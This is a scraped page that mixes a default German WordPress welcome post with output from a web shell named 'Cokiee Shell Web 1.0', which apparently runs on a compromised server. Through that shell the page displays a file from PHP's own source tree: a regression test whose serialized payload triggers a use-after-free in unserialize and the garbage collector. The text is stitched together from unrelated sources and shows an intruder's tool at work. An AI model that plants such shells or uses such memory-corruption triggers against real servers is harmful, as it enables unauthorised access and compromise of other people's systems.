Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/strings/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/strings/bug72433.phpt |
--TEST-- Bug #72433: Use After Free Vulnerability in PHP's GC algorithm and unserialize --FILE-- <?php // Fill any potential freed spaces until now. $filler = array(); for($i = 0; $i < 100; $i++) $filler[] = ""; // Create our payload and unserialize it. $serialized_payload = 'a:3:{i:0;r:1;i:1;r:1;i:2;C:11:"ArrayObject":19:{x:i:0;r:1;;m:a:0:{}}}'; $free_me = unserialize($serialized_payload); // We need to increment the reference counter of our ArrayObject s.t. all reference counters of our unserialized array become 0. $inc_ref_by_one = $free_me[2]; // The call to gc_collect_cycles will free '$free_me'. gc_collect_cycles(); // We now have multiple freed spaces. Fill all of them. $fill_freed_space_1 = "filler_zval_1"; $fill_freed_space_2 = "filler_zval_2"; var_dump($free_me); ?> --EXPECTF-- array(3) { [0]=> array(3) { [0]=> *RECURSION* [1]=> *RECURSION* [2]=> object(ArrayObject)#%d (1) { ["storage":"ArrayObject":private]=> *RECURSION* } } [1]=> array(3) { [0]=> *RECURSION* [1]=> *RECURSION* [2]=> object(ArrayObject)#%d (1) { ["storage":"ArrayObject":private]=> *RECURSION* } } [2]=> object(ArrayObject)#%d (1) { ["storage":"ArrayObject":private]=> array(3) { [0]=> *RECURSION* [1]=> *RECURSION* [2]=> *RECURSION* } } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare